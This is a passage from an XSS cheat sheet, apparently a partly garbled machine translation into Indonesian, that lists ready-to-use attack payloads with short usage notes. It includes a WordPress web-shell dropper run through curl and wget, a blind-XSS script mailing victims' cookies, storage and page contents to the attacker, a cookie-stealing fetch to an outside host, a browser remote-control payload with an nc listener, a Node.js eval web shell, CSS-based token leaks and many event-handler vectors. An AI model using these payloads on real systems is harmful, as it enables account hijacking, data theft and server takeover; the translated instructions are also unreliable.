  825. b.open('POST', p, 1);
  826.  
  827. b.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  828.  
  829. b.send($);
  830.  
  831. b.onreadystatechange = function(){
  832.  
  833. if (this.readyState == 4) fetch('/wp-content/plugins/hello.php');
  834.  
  835. }
  836.  
  837. => Jalankan perintah shell web di terminal seperti berikut ("id" sebagai contoh):
  838.  
  839. $ curl DOMAIN/wp-content/plugins/hello.php -d 1=id
  840.  
  841. $ wget -qO- DOMAIN/wp-content/plugins/hello.php --post-data 1=id
  842.  
  843. > Blind XSS Mailer
  844.  
  845. Gunakan sebagai skrip remote XSS blind yang menyimpan file PHP dan ubah $ menjadi dan $ header header
  846.  
  847. demikian. Diperlukan server surat yang berfungsi seperti Postfix.
  848.  
  849. <?php header("Content-type: application/javascript"); ?>
  850.  
  851. var mailer = '<?= "//" . $_SERVER\["SERVER_NAME"\] . $_SERVER\["REQUEST_URI"\] ?>';
  852.  
  853. var msg = 'USER AGENT\\n' + navigator.userAgent + '\\n\\nTARGET URL\\n' + document.URL;
  854.  
  855. msg += '\\n\\nREFERRER URL\\n' + document.referrer + '\\n\\nREADABLE COOKIES\\n' +
  856.  
  857. document.cookie;
  858.  
  859. msg += '\\n\\nSESSION STORAGE\\n' + JSON.stringify(sessionStorage) + '\\n\\nLOCAL
  860.  
  861. STORAGE\\n' + JSON.stringify(localStorage);
  862.  
  863. msg += '\\n\\nFULL DOCUMENT\\n' + document.documentElement.innerHTML;
  864.  
  865. var r = new XMLHttpRequest();
  866.  
  867. r.open('POST', mailer, true);
  868.  
  869. r.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
  870.  
  871. r.send('origin=' + document.location.origin + '&msg=' + encodeURIComponent(msg));
  872.  
  873.  
  874.  
  875. <?php
  876.  
  877. header("Access-Control-Allow-Origin: " . $_POST\["origin"\]);
  878.  
  879. $origin = $_POST\["origin"\];
  880.  
  881. $to = "myName@myDomain";
  882.  
  883. $subject = "XSS Blind Report for " . $origin;
  884.  
  885. $ip = "Requester: " . $_SERVER\["REMOTE_ADDR"\] . "\\nForwarded For: ".
  886.  
  887. $_SERVER\["HTTP_X_FORWARDED_FOR"\];
  888.  
  889. $msg = $subject . "\\n\\nIP ADDRESS\\n" . $ip . "\\n\\n" . $_POST\["msg"\];
  890.  
  891. $headers = "From: report@myDomain" . "\\r\\n";
  892.  
  893. if ($origin && $msg) mail($to, $subject, $msg, $headers);
  894.  
  895. ?>
  896.  
  897. > Invisible Foreign XSS Embedding
  898.  
  899. Gunakan untuk memuat XSS dari domain lain (atau subdomain) ke domain saat ini. Dibatasi oleh
  900.  
  901. header X-Frame-Options (XFO) target. Contoh peringatan di bawah ini dalam konteks brutelogic.com.br
  902.  
  903. terlepas dari domain.
  904.  
  905. <iframe src="//brutelogic.com.br/xss.php?a=<svg onload=alert(document.domain)>"
  906.  
  907. style=display:none></iframe>
  908.  
  909. > Cookie Stealing
  910.  
  911. Gunakan untuk mendapatkan semua cookie dari pengguna korban yang ditetapkan oleh situs target. Cookie tidak dapat dilindungi oleh
  912.  
  913. http Hanya bendera keamanan. Encode "+" sebagai "% 2B" di URL.
  914.  
  915. fetch('//brutelogic.com.br/?c='+document.cookie)
  916.  
  917. > Simple Virtual Defacement
  918.  
  919. Gunakan untuk mengubah bagaimana situs akan muncul ke korban menyediakan kode HTML. Dalam contoh di bawah ini a
  920.  
  921. Pesan "Tidak Ditemukan" ditampilkan.
  922.  
  923. documentElement.innerHTML='<h1>Not Found</h1>'
  924.  
  925. > Browser Remote Control
  926.  
  927. Gunakan untuk menghubungkan browser dan mengirim perintah javascript ke dalamnya secara interaktif. Gunakan javascript
  928.  
  929. kode di bawah ini bukannya peringatan (1) dalam injeksi Anda dengan terminal seperti Unix yang terbuka dengan
  930.  
  931. mengikuti skrip shell (pendengar). Berikan HOST sebagai nama host, alamat IP, atau domain ke
  932.  
  933. menerima perintah dari mesin penyerang.
  934.  
  935. => Javascript (payload):
  936.  
  937. setInterval(function(){with(document)body.
  938.  
  939. appendChild(createElement('script')).src='//HOST:5855'},100)
  940.  
  941. => Listener (terminal command):
  942.  
  943. $ while :; do printf "j$ "; read c; echo $c | nc -lp 5855 >/dev/null; done
  944.  
  945. > Node.js Web Shell
  946.  
  947. Gunakan untuk membuat shell web di aplikasi Node.js yang rentan. Setelah menjalankan payload di bawah ini
  948.  
  949. gunakan shell dengan cara berikut: http: // target: 5855 /? cmd = my_node.js_command
  950.  
  951. Contoh untuk pop calc: cmd = membutuhkan ('child_process'). Exec ('gnome-calculator').
  952.  
  953. require('http').createServer(function(req,res){res.end(1-
  954.  
  955. eval(require('url').parse(req.url,1).query.cmd))}).listen(5855)
  956.  
  957. > HTMLi Token Leak
  958.  
  959. Gunakan ketika XSS tidak memungkinkan tetapi beberapa injeksi HTML mungkin terjadi. Itu akan memeras apa pun
  960.  
  961. token anti-CSRF (atau nilai rahasia lainnya) yang mungkin ada di antara berbasis sumber
  962.  
  963. refleksi dan kutipan tunggal berikutnya dalam kode asli. Berikan HOST dengan skrip untuk meraih
  964.  
  965. parameter token atau periksa log server. Terlepas dari contoh di bawah ini, <img atau <tag gambar dengan
  966.  
  967. src = 'atau srcset =' juga melakukan pekerjaan itu.
  968.  
  969. <x style='content:url(//HOST/?token=
  970.  
  971. <x style='background:url(//HOST/?token=
  972.  
  973. <x style='background-image:url(//HOST/?token=
  974.  
  975. \# miscellaneous
  976.  
  977. > XSS Online Test Page
  978.  
  979. Gunakan untuk berlatih vektor dan muatan XSS. Periksa kode sumber untuk titik injeksi.
  980.  
  981. [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php "https://brutelogic.com.br/xss.php")
  982.  
  983. > Multi-Case HTML Injection
  984.  
  985. Gunakan sebagai satu-shot untuk mendapatkan tingkat XSS sukses yang lebih tinggi. Ini berfungsi dalam semua kasus HTML
  986.  
  987. konteks (lihat bagian Dasar-dasar), termasuk JS dengan injeksi tag. Perhatikan spasi sebagai
  988.  
  989. failover untuk sanitasi / pelarian sederhana yang dilakukan oleh aplikasi.
  990.  
  991. </Script/"'--><Body /Autofocus /OnFocus = confirm\`1\` <!-->
  992.  
  993. > Multi-Case HTML Injection - Base64
  994.  
  995. > Gunakan sebagai satu-shot untuk mendapatkan tingkat XSS sukses lebih tinggi di bidang input Base64. Itu bekerja di semua kasus konteks HTML (lihat bagian Dasar), termasuk JS yang berisi injeksi tag
  996.  
  997. PC9TY3JpcHQvIictLT48Qm9keSAvQXV0b2ZvY3VzIC9PbkZvY3VzID0gY29uZmlybWAxYCA8IS0tPg==
  998.  
  999. > JavaScript Libraries Scraper
  1000.  
  1001. Gunakan untuk mendapatkan semua tautan absolut dan relatif ke perpustakaan yang ditemukan dalam kode sumber
  1002.  
  1003. DOMAIN / HALAMAN. Ini perintah satu baris dan "$" adalah terminal prompt.
  1004.  
  1005. $ wget -nd -rH -A js --spider DOMAIN/PAGE 2>&1 | awk '/^--.*\\.js?/{print $3}'
  1006.  
  1007. > PHP Sanitizing for XSS
  1008.  
  1009. Gunakan untuk mencegah XSS dalam setiap konteks selama input tidak mencerminkan non-delimited
  1010.  
  1011. string, di tengah-tengah backticks atau fungsi lain seperti eval (semua yang ada dalam konteks JS). Itu
  1012.  
  1013. tidak mencegah terhadap XSS berbasis DOM, hanya kasus XSS berbasis sumber.
  1014.  
  1015. $input = preg_replace("/:|\\\\\\/", "", htmlentities($input, ENT_QUOTES))
  1016.  
  1017. > JavaScript Execution Delay
  1018.  
  1019. Gunakan saat pustaka javascript atau sumber daya lain yang diperlukan untuk injeksi tidak dimuat sepenuhnya
  1020.  
  1021. dalam pelaksanaan payload. Contoh panggilan eksternal berbasis JQuery.
  1022.  
  1023. onload=function(){$.getScript('//brutelogic.com.br/2.js')}
  1024.  
  1025. onload=x=>$.getScript('//brutelogic.com.br/2.js')
  1026.  
  1027. > Valid Source for Image Tags
  1028.  
  1029. Gunakan saat diperlukan atribut src yang valid untuk memicu peristiwa yang dimuat alih-alih satu kesalahan.
  1030.  
  1031. <img src=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=onload=alert(1)>
  1032.  
  1033. > Shortest XSS
  1034.  
  1035. Gunakan ketika Anda memiliki slot terbatas untuk injeksi. Membutuhkan naskah asli (ada dalam sumber
  1036.  
  1037. kode sudah) dipanggil dengan jalur relatif ditempatkan setelah tempat injeksi. Server penyerang
  1038.  
  1039. harus membalas dengan skrip serang ke permintaan persis yang dilakukan oleh skrip asli (jalur yang sama) atau
  1040.  
  1041. dalam halaman 404 default (lebih mudah). Domain yang lebih pendek, semakin baik.
  1042.  
  1043. <base href=//knoxss.me>
  1044.  
  1045. > Mobile-only Event Handlers
  1046.  
  1047. Gunakan saat menargetkan aplikasi seluler.
  1048.  
  1049. <html ontouchstart=alert(1)>
  1050.  
  1051. <html ontouchend=alert(1)>
  1052.  
  1053. <html ontouchmove=alert(1)>
  1054.  
  1055. <body onorientationchange=alert(1)>
  1056.  
  1057. > Body Tag
  1058.  
  1059. Kumpulan vektor tubuh. Yang terakhir hanya berfungsi untuk browser Microsoft.
  1060.  
  1061. <body onload=alert(1)>
  1062.  
  1063. <body onpageshow=alert(1)>
  1064.  
  1065. <body onfocus=alert(1)>
  1066.  
  1067. <body onhashchange=alert(1)><a href=%23x>click this!#x
  1068.  
  1069. <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
  1070.  
  1071. <body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br>
  1072.  
  1073. <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
  1074.  
  1075. <br><x id=x>#x
  1076.  
  1077. <body onresize=alert(1)>press F12!
  1078.  
  1079. <body onhelp=alert(1)>press F1!
  1080.  
  1081. > Less Known XSS Vectors
  1082.  
  1083. Kumpulan vektor XSS yang kurang dikenal.
  1084.  
  1085. <marquee onstart=alert(1)>
  1086.  
  1087. <marquee loop=1 width=0 onfinish=alert(1)>
  1088.  
  1089. <audio src onloadstart=alert(1)>
  1090.  
  1091. <video onloadstart=alert(1)><source>
  1092.  
  1093. <input autofocus onblur=alert(1)>
  1094.  
  1095. <keygen autofocus onfocus=alert(1)>
  1096.  
  1097. <form onsubmit=alert(1)><input type=submit>
  1098.  
  1099. <select onchange=alert(1)><option>1<option>2
  1100.  
  1101. <menu id=x contextmenu=x onshow=alert(1)>right click me!
  1102.  
  1103. <object onerror=alert(1)>
  1104.  
  1105. > Alternative PoC - Shake Your Body
  1106.  
  1107. Gunakan untuk mengguncang semua elemen halaman sebagai visualisasi kerentanan yang baik.
  1108.  
  1109. setInterval(x=>{b=document.body.style,b.marginTop=(b.marginTop=='4px')?'-4px':'4px';},5)
  1110.  
  1111. > Alternative PoC - Brutality
  1112.  
  1113. Gunakan untuk menampilkan gambar karakter Sub-Zero Mortal Kombat bersama dengan "kebrutalan"
  1114.  
  1115. suara game.
  1116.  
  1117. d=document,i=d.createElement('img');i.src='//brutelogic.com.br/brutality.jpg';
  1118.  
  1119. d.body.insertBefore(i,d.body.firstChild);new(Audio)('//brutelogic.com.br/brutality.mp3').play();
  1120.  
  1121. > Alternative PoC - Alert Hidden Values
  1122.  
  1123. Gunakan untuk membuktikan bahwa semua nilai HTML tersembunyi seperti token dan nonces di halaman target dapat dicuri.
  1124.  
  1125. f=document.forms;for(i=0;i<f.length;i++){e=f\[i\].elements;for(n in e){if(e\[n\].type=='hidden')
  1126.  
  1127. {alert(e\[n\].name+': '+e\[n\].value)}}}
  1128.  
  1129. > Improved Likelihood of Mouse Events
  1130.  
  1131. Gunakan untuk membuat area yang lebih besar untuk memicu aktivitas mouse. Tambahkan yang berikut ini (sebagai atribut)
  1132.  
  1133. di dalam vektor XSS apa pun yang menggunakan acara mouse seperti onmouseover, onclick, dll.
  1134.  
  1135. style=position:fixed;top:0;left:0;font-size:999px
  1136.  
  1137. > Alternative to Style Tag
  1138.  
  1139. Gunakan saat kata kunci "style" diblokir untuk inline dan nama tag. Berikan HOST dan FILE
  1140.  
  1141. untuk CSS atau hanya CSS saja dalam vektor kedua.
  1142.  
  1143. <link rel=stylesheet href=//HOST/FILE>
  1144.  
  1145. <link rel=stylesheet href=data:text/css,CSS>
  1146.  
  1147. > Simple Google Scraper
  1148.  
  1149. Gunakan untuk mengikis hasil Google untuk QUERY yang diberikan, yang harus disediakan di terminal
  1150.  
  1151. skrip di bawah ini. Ini adalah baris perintah dan "$" adalah terminal prompt.
  1152.  
  1153. $ q="QUERY"; wget -U "Opera/4" "[https://google.com/search?num=100&q=](https://google.com/search?num=100&q= "https://google.com/search?num=100&q=")$q" -qO- | sed "s/+$q/ /g" | egrep -o ":.{12}:https?://\\S*\\??\\S*" | sed "s/.*:h/h/
  1154.  
  1155. > Simple XSS Guesser
  1156.  
  1157. Gunakan untuk menemukan kelemahan XSS dengan menggunakan parameter yang tidak jelas. Cukup sediakan TARGET, sebuah XSS
  1158.  
  1159. probe (seperti <x) dan PARAMLIST, file dengan parameter 1 halaman per baris (seperti id, cod, q, query
  1160.  
  1161. dll) dalam skrip terminal di bawah ini. Ini adalah baris perintah dan "$" adalah terminal prompt.
  1162.  
  1163. $ t="TARGET/"; x="XSS"; q=?; while read p; do q="$q&$p=$x"; done < PARAMLIST; wget -qO- $t$q | grep $x && echo "$t !"
  1164.  
  1165. > Cross-Origin Script (Crosspwn)
  1166.  
  1167. Simpan konten di bawah ini sebagai file .php dan gunakan sebagai berikut:
  1168.  
  1169. http: //localhost/crosspwn.php? target = // hacker.com.br/tests/
  1170.  
  1171. status.html & msg = peringatan <script> (document.domain)
  1172.  
  1173. Di mana "facebook.com" adalah asal yang diizinkan dan "localhost" sedang menyerang domain,
  1174.  
  1175. "//hacker.com.br/tests/status.html" adalah halaman target dan "peringatan <script> (document.domain)"
  1176.  
  1177. dikirim pesan.
  1178.  
  1179. Penggunaan lain adalah untuk menembak penangan event body onresize dan onhash tanpa pengguna
  1180.  
  1181. interaksi:
  1182.  
  1183. http: //localhost/crosspwn.php? target = // hacker.com.br/xss.php? a = <body /
  1184.  
  1185. onresize = lansiran (document.domain)>
  1186.  
  1187. Dan untuk mempersingkat dan menyembunyikan muatan yang disuntikkan, bidang tambahan "nama" dapat digunakan.
  1188.  
  1189. http: //localhost/crosspwn.php? target = // hacker.com.br/xss.php? a = <svg /
  1190.  
  1191. onload = eval (name)> & name = alert (document.domain)
  1192.  
  1193. => Code:
  1194.  
  1195. <!DOCTYPE html>
  1196.  
  1197. <body onload="crossPwn()">
  1198.  
  1199. <h2>CrossPwn</h2>
  1200.  
  1201. <iframe src="<?=htmlentities($_GET\['target'\], ENT_QUOTES) ?>" name="<?=
  1202.  
  1203. $_GET\['name'\] ?>" height="0" style="visibility:hidden"></iframe>
  1204.  
  1205. <script>
  1206.  
  1207. function crossPwn() {
  1208.  
  1209. frames\[0\].postMessage('<?php echo $_GET\["msg"\] ?>','*'); // onmessage
  1210.  
  1211. document.getElementsByTagName('iframe')\[0\].setAttribute('height', '1'); // onresize
  1212.  
  1213. document.getElementsByTagName('iframe')\[0\].src = '<?=$_GET\["target"\] ?>' + '#brute'; //
  1214.  
  1215. onhashchange
  1216.  
  1217. }
  1218.  
  1219. </script>
  1220.  
  1221. </body>
  1222.  
  1223. </html>
  1224.  
  1225. \# Payload Xss
  1226.  
  1227. [https://github.com/3xploit-db/XSS-Payloads/blob/master/payload.txt](https://github.com/3xploit-db/XSS-Payloads/blob/master/payload.txt "https://github.com/3xploit-db/XSS-Payloads/blob/master/payload.txt")
  1228.  
  1229. \# ASCII Encoding Table
  1230.  
  1231. <h4 align="center"><img src="![](https://raw.githubusercontent.com/3xploit-db/xss-cheat-sheet/master/ascii.png)" width="500px" height="500px"></h4>
  1232.  
  1233.  
  1234.  
  1235.  
  1236.  
  1237. Enter a message below to start chatting with ChatGPT
  1238.  
  1239. Enter a prompt...
  1240. Review us
  1241.  
  1242. Give feedback
Add Comment
Please, Sign In to add comment